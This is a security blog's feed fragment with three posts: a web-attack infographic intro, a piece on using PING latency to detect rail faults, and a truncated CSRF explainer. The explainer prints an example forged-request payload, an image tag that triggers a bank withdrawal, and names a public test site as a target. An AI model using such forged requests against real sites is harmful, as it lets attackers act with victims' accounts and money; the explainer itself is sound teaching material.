&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
In this article, we are going to explain you the five stages of a Web App Attack from a hacker’s perspective. The each stage will be explained into three parts —&amp;nbsp;&lt;em style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;What is it? How does it work? How do I defend myself against it?&lt;/em&gt;&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
The five stages that will be explained ahead are: Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks.&lt;/div&gt;
&lt;div style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Let’s take a look at this useful infographic by&amp;nbsp;&lt;a href=&quot;https://blog.barricade.io/anatomy-of-a-web-app-attack/&quot; rel=&quot;nofollow&quot; style=&quot;border: 0px; color: #3366ff; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;Barricade&lt;/a&gt;, an Early Warning System against Hackers.&lt;/div&gt;
&lt;h2 class=&quot;entry-title&quot; style=&quot;border: 0px; color: #444444; font-family: inherit; font-size: 34px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
Anatomy of a Web App Attack – Visually Explained&lt;/h2&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih9fDohvGskoRG0o62XnFCLIV-Ig9ICzoi3roa81AaRBdhu03BEQpFaiMfxMNVzX5gdkINN1tO3Nb1drhhTGoEytMC6e254A-WVhKTwp8iYq3oKoGFYdU72EHy5_ggjpdC7jcXT2vB6VQ/s1600/Web-App-Attack-Infographic-Compressed-.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih9fDohvGskoRG0o62XnFCLIV-Ig9ICzoi3roa81AaRBdhu03BEQpFaiMfxMNVzX5gdkINN1tO3Nb1drhhTGoEytMC6e254A-WVhKTwp8iYq3oKoGFYdU72EHy5_ggjpdC7jcXT2vB6VQ/s1600/Web-App-Attack-Infographic-Compressed-.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/2738997572270824326/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2016/01/what-is-web-app-attack-how-does-it-work.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/2738997572270824326'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/2738997572270824326'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2016/01/what-is-web-app-attack-how-does-it-work.html' title='What Is A Web App Attack, How Does It Work — 5 Stages Of A Web App Attack'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVa5JzSdd0jusFLOsPDboZ6fjbCchWRQJx_h-dKphdnFka7pilBF9k2rZY5a5MtXoxpsZUJg1EQjWI1w51m3OqWlCCjU_GbS7tdDrn0AQlJ4JeEL5FEZKDgNZhALNuzKqyU-KFlo2TIzI/s72-c/web-app-attack-5-stages.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-1863365528038964888</id><published>2016-01-10T19:19:00.001-08:00</published><updated>2016-01-10T19:19:44.231-08:00</updated><title type='text'>How PING Could Save and Prevent Deadly Accidents</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpbVB2aVr2kx6K92dBeT26KDBBiygIPhGOkedGcTF23v-q860BT_06SEb5CMofyHpmRc2v1fjMwzeHohtFHqfuv5q0_PBCv0EMX27BoAK_e4eBbxBfN7k8bM_eqG0ekXrA-JXzD5FBUY/s1600/maxresdefault.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;241&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpbVB2aVr2kx6K92dBeT26KDBBiygIPhGOkedGcTF23v-q860BT_06SEb5CMofyHpmRc2v1fjMwzeHohtFHqfuv5q0_PBCv0EMX27BoAK_e4eBbxBfN7k8bM_eqG0ekXrA-JXzD5FBUY/s400/maxresdefault.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4 style=&quot;background-color: white; box-sizing: border-box; clear: both; color: #333333; font-family: Abel, sans-serif; font-size: 26px; line-height: 1.1; margin-bottom: 10px; margin-top: 10px; text-align: center; text-transform: uppercase;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box;&quot;&gt;&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;IAN TRUMP OF LOGICNOW WONDERS WHETHER THE HUMBLE PING COULD BE OUR SAVIOUR&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;This Government of Canada&amp;nbsp;&lt;span style=&quot;box-sizing: border-box; font-weight: 700;&quot;&gt;&lt;a href=&quot;http://news.gc.ca/web/article-en.do?nid=1025869&quot; style=&quot;background-color: transparent; box-sizing: border-box; color: #d30808; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;press release&lt;/a&gt;&lt;/span&gt;&amp;nbsp;caught my eye on a recent newsfeed. The release tells the story of how&amp;nbsp;&lt;a href=&quot;http://www.websitepulse.com/blog/what-is-ping-test&quot; style=&quot;background-color: transparent; box-sizing: border-box; color: #d30808; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;box-sizing: border-box; font-weight: 700;&quot;&gt;PING&lt;/span&gt;&lt;/a&gt;&amp;nbsp;could save and prevent accidents. It’s one of those reports that uses language which for most of us is completely unintelligible or steeped in scientific nuance. So let me break it down for you: a train fell off the tracks and PING could have stopped it.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;Hold on, how can something as simple as an&amp;nbsp;&lt;a href=&quot;https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol&quot; style=&quot;background-color: transparent; box-sizing: border-box; color: #d30808; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;box-sizing: border-box; font-weight: 700;&quot;&gt;Internet Control Message Protocol (ICMP)&lt;/span&gt;&amp;nbsp;&lt;/a&gt;packet save lives? The reality is actually kind of obvious in this world of&amp;nbsp;&lt;span style=&quot;box-sizing: border-box; font-weight: 700;&quot;&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Internet_of_Things&quot; style=&quot;background-color: transparent; box-sizing: border-box; color: #d30808; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Internet of things (IoT)&lt;/a&gt;&lt;/span&gt;&amp;nbsp;– latency. Using this analogy, the number of seconds or milliseconds it takes for a packet of data to go from one place or another could have prevented this train from being derailed. If there is a change in the latency, there is a problem on the tracks. Yes, my friends, PING works on rail tracks, which in a way are like giant cables reaching out across the nations.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;This fact got me thinking. PING is one of the most basic of IT functions. The PING check is built into almost every&amp;nbsp;&lt;span style=&quot;box-sizing: border-box; font-weight: 700;&quot;&gt;&lt;a href=&quot;https://www.techopedia.com/definition/28529/remote-monitoring-and-management-rmm&quot; style=&quot;background-color: transparent; box-sizing: border-box; color: #d30808; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Remote Monitoring and Management Tool (RMM)&lt;/a&gt;&lt;/span&gt;&amp;nbsp;on the market today, including our own MAXfocus platform. However, this story is not about our great products, it’s about how PING could have mitigated a train derailment – it blows my mind that all of sudden ICMP becomes the deciding factor between business-as-usual and disaster.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;img alt=&quot;virus-gifs-7&quot; class=&quot;aligncenter size-full wp-image-36947&quot; height=&quot;358&quot; src=&quot;https://www.hackread.com/wp-content/uploads/2016/01/virus-gifs-7.gif&quot; style=&quot;border: 0px; box-sizing: border-box; clear: both; display: block; height: auto; margin-left: auto; margin-right: auto; max-width: 100%; vertical-align: middle;&quot; width=&quot;660&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;If you can accept the idea that the railway is like a big, conductive pipe and has a TCIP stack, you can accept the idea that a simple PING could tell you a lot about the quality of transmission. The intimate relationship between PING and the quality of the Layer 1 – i.e. the physical layer – is well known: bad cable equals latency and dropped packets. If you’ve sent thousands or hundreds of thousands of PINGS you would know what the average response time should be.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span class=&quot;s1&quot; style=&quot;box-sizing: border-box;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;col-sm-12 _fullsquaread&quot; style=&quot;background: rgb(255, 255, 255); box-sizing: border-box; color: #333333; float: left; font-family: &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 20px; margin-top: 10px; min-height: 1px; padding: 10px 15px; position: relative; text-align: center; width: 747.328px;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;When the response time is radically different or there is no response; then you know you have a problem. But surely life is not that simple? Oddly with PING, it really is. One of the first things a helpdesk does (after making you reboot) is to ask you to PING the router/IP you need to get to. If you can’t “see” it, you have a connection problem.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;Understanding this is going to be key to understanding the IoT. PING will become, if it is not already, one of the default troubleshooting protocols/services we will use to figure out connectivity. If PING does not return, there is a problem. It’s astounding to me that we still have problems understanding this concept.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;p1&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;We live in a world where 8.8.8.8 has to answer to a PING if it does not some folks would suggest we will all die, or at the very least our Shoes.com websites will load really slowly. PING is not DNS, it’s not even Https, it’s lower level and it’s what we use to determine – in IT terms – if you are alive or not. There are lots of folks that turn PING off on their outside interface because of the PING of death, which caused so many problems back in the day, but if you’re still running a firewall that can’t handle a packet outside of an RFC spec you have other much more serious problems.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;But I digress. I said PING will save us and I meant it. We have big data – LOGICcards is an example of that – but how cool would it be if your PING check worked across all of the customers?&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;Imagine if our 2 million endpoints could tell you the expected PING time to important websites and if your customer’s PING time was outside that. No one will ever complain about too fast, but the phones light up if we’re too slow. How cool would that be?&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;So, how does this affect the IoT or rail cars traveling down the line? It’s simple. If PING gets too long, or there is no ECHO then stop the train, because something is not right. If something is not right it could mean a physical problem that could derail your train. It’s not a super technical thing – if it’s not ECHO’ing a reply it’s probably not online. If it’s not online and it needs to be you better go fix it.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: Ubuntu, sans-serif; font-size: 17px; line-height: 1.7; margin-bottom: 1.5rem; margin-top: 1.5rem;&quot;&gt;
&lt;span style=&quot;box-sizing: border-box; color: black;&quot;&gt;PING may just save you a world of pain when and prevent your train – metaphorical or not –from going off the tracks.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackers24x7.blogspot.com/feeds/1863365528038964888/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackers24x7.blogspot.com/2016/01/how-ping-could-save-and-prevent-deadly.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/1863365528038964888'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3275619147523422902/posts/default/1863365528038964888'/><link rel='alternate' type='text/html' href='http://hackers24x7.blogspot.com/2016/01/how-ping-could-save-and-prevent-deadly.html' title='How PING Could Save and Prevent Deadly Accidents'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpbVB2aVr2kx6K92dBeT26KDBBiygIPhGOkedGcTF23v-q860BT_06SEb5CMofyHpmRc2v1fjMwzeHohtFHqfuv5q0_PBCv0EMX27BoAK_e4eBbxBfN7k8bM_eqG0ekXrA-JXzD5FBUY/s72-c/maxresdefault.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3275619147523422902.post-8379347440200141969</id><published>2016-01-01T20:26:00.004-08:00</published><updated>2016-01-01T20:26:37.877-08:00</updated><title type='text'>Leaving your websites open to attack?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h1 class=&quot;entry-title&quot; style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-weight: 300; height: auto; line-height: 1.1; margin: 0px 0px 10px; outline: 0px !important; overflow: visible; text-overflow: clip; white-space: normal;&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-size: 28px;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,sans-serif;&quot;&gt;Leaving
your websites open to attack?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; mso-outline-level: 2;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,sans-serif; font-size: 14.0pt; mso-bidi-font-size: 18.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN; mso-font-kerning: 18.0pt;&quot;&gt;70% of websites and
networks are hackable!&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;inherit&amp;quot;,serif; font-size: 22.0pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-font-size: 24.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN; mso-font-kerning: 18.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; mso-outline-level: 2;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,sans-serif; font-size: 14.0pt; mso-bidi-font-size: 18.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN; mso-font-kerning: 18.0pt;&quot;&gt;Close your doors shut
before hackers find you&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;inherit&amp;quot;,serif; font-size: 22.0pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-bidi-font-size: 24.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN; mso-font-kerning: 18.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;



&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-size: 28px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-size: 28px;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Open Sans&#39;, sans-serif; font-size: 18pt;&quot;&gt;CSRF Attacks, XSRF or Sea-Surf – What They Are and How to
Defend Against Them&lt;/span&gt;&lt;/div&gt;
&lt;/h1&gt;
&lt;h1 class=&quot;entry-title&quot; style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 28px; font-weight: 300; height: auto; line-height: 1.1; margin: 0px 0px 10px; outline: 0px !important; overflow: visible; text-overflow: clip;&quot;&gt;

&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/h1&gt;
&lt;h1 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 42px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px; outline: 0px !important;&quot;&gt;
&lt;header class=&quot;entry-header&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 30px; margin: 20px 0px; outline: 0px !important; padding-bottom: 0px; padding-top: 8px;&quot;&gt;&lt;span style=&quot;font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;Cross-Site Request Forgery, or CSRF for short is a common and regular online attack. CSRF also goes by the acronym XSRF and the phrase “Sea-Surf”. CSRF attacks include a malicious exploit of a website in which a user will transmit malicious requests that the target website trusts without the user’s consent. In&lt;/span&gt;&lt;span style=&quot;font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.acunetix.com/websitesecurity/cross-site-scripting/&quot; style=&quot;background: transparent; box-sizing: border-box; color: #e31e25; font-size: 14px; line-height: 20px; outline: 0px !important; text-align: justify; text-decoration: none; transition: all 0.2s ease-in;&quot; title=&quot;What is Cross-Site Scripting?&quot;&gt;Cross-Site Scripting (XSS)&lt;/a&gt;&lt;span style=&quot;font-size: 14px; line-height: 20px; text-align: justify;&quot;&gt;, the attacker exploits the trust a user has for a website, with CSRF on the other hand, the attacker exploits the trust a website has against a user’s browser.&lt;/span&gt;&lt;/header&gt;&lt;div class=&quot;entry-content&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; outline: 0px !important;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Basically, an attacker will use CSRF to trick a victim into accessing a website or clicking a URL link that contains malicious or unauthorized requests. It is called ‘malicious’ since the CSRF attack will use the identity and privileges of the victim and impersonate them in order to perform any actions desired by the attacker, such as change form submission details, and launch purchases or payments for the attacker or a third-party account.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
Upon a request against most websites, browsers will include along any credentials related with the particular website, such as the session cookie of the user, basic authentication credentials, the IP address of the user, etc. Thus, if user’s authentication session is still valid, an attacker can use CSRF to launch any desired requests against the website, without the website being able to distinguish whether the requests are legitimate or not.&lt;/div&gt;
&lt;/div&gt;
&lt;/h1&gt;
&lt;h2 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 21px; font-weight: 400; line-height: 1.1; margin-bottom: 10px; margin-top: 20px; outline: 0px !important;&quot;&gt;
A Simple Example of a Cross-Site Request Forgery&lt;/h2&gt;
&lt;h1 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 42px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px; outline: 0px !important;&quot;&gt;
&lt;div class=&quot;entry-content&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; outline: 0px !important;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
As described above, in order for a CSRF attack to be performed, the user must be authenticated with the target website. Assuming the victim is authenticated, the attacker can include a link or script in a third-party website that the victim visits. Thus, when the victim visits that website or link, the rogue script will be executed without the victim being aware of it. For instance, in a chat forum, an attacker posts a message which contains an image tag or an HTML image element. However, the source of the image contains a link which performs an action on a victim’s bank website account. So, instead of an image file the attacker has included a link that performs a bank transaction. Below is an example of the image tag containing a rogue URL.&lt;/div&gt;
&lt;pre style=&quot;background-color: whitesmoke; border-radius: 4px; border: 1px solid rgb(204, 204, 204); box-sizing: border-box; font-family: Menlo, Monaco, Consolas, &#39;Courier New&#39;, monospace; font-size: 13px; line-height: 1.42857; margin-bottom: 10px; outline: 0px !important; overflow: auto; padding: 9.5px; word-break: break-all; word-wrap: break-word;&quot;&gt;&amp;lt;img src=&quot;http://bank.example.com/withdraw?account=bob&amp;amp;amount=1000000&amp;amp;for=Fred&quot;&amp;gt;&lt;/pre&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The above is a CSRF attack using an HTTP GET request. As we shall see later, a prevention method would allow only HTTP POST requests, in order to prevent the above attack method. However, this can be easily bypassed, since an attacker can use an HTTP POST request to perform a CSRF attack.&lt;/div&gt;
&lt;/div&gt;
&lt;/h1&gt;
&lt;h2 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 21px; font-weight: 400; line-height: 1.1; margin-bottom: 10px; margin-top: 20px; outline: 0px !important;&quot;&gt;
CSRF Example Using an HTTP POST Request&lt;/h2&gt;
&lt;h1 style=&quot;box-sizing: border-box; color: inherit; font-family: inherit; font-size: 42px; font-weight: 500; line-height: 1.1; margin: 20px 0px 10px; outline: 0px !important;&quot;&gt;
&lt;div class=&quot;entry-content&quot; style=&quot;background-color: white; box-sizing: border-box; color: #333333; font-family: &#39;Open Sans&#39;, &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; outline: 0px !important;&quot;&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
In this example the attacker will use an HTTP POST request to realize a CSRF attack. Since the HTTP GET request is not allowed to be used as a prevention measure against a CSRF attack, an attacker can use the HTTP POST request which will perform the CSRF as successfully as the HTTP GET request. It is very difficult for the target website to distinguish between legitimate and rogue HTTP GET or POST requests, since the requests are sent from a “trusted” browser. That means that if no prevention measures are in place, a CSRF attack can be performed transparently without the victim or target website realizing it.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The purpose of the attack, in this example, is to change the profile information of a particular user (victim) on the target website. The target website for this example will be http://testphp.vulnweb.com/.&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;&lt;img alt=&quot;Target Website Example for CSRF Attack&quot; class=&quot;aligncenter wp-image-8506 size-full&quot; height=&quot;319&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/01/CSRF-1.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF Attacks&quot; width=&quot;360&quot; /&gt;&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;The victim has an account on testphp.vulnweb.com which includes personal information as seen below.&lt;br style=&quot;box-sizing: border-box; outline: 0px !important;&quot; /&gt;&lt;img alt=&quot;Example victim of CSRF attack&quot; class=&quot;aligncenter size-full wp-image-8508&quot; height=&quot;319&quot; src=&quot;http://www.acunetix.com/wp-content/uploads/2013/01/CSRF-2.jpg&quot; style=&quot;border-radius: 4px; border: 0px; box-sizing: border-box; display: block; height: auto; margin: 0px auto; max-width: 100%; outline: 0px !important; vertical-align: middle;&quot; title=&quot;CSRF&quot; width=&quot;360&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
The attacker uses CSRF to change the information on the victim’s profile. This, as mentioned earlier, requires the victim to be authenticated with the target website. A user can update the profile information by using the given form in the ‘Your profile’ page. The code of the particular form is shown below.&lt;/div&gt;
&lt;div style=&quot;box-sizing: border-box; margin-bottom: 10px; outline: 0px !important; text-align: justify;&quot;&gt;
CSRF Example in – http://testphp.vulnweb.com/userinfo.php&lt;/div&gt;
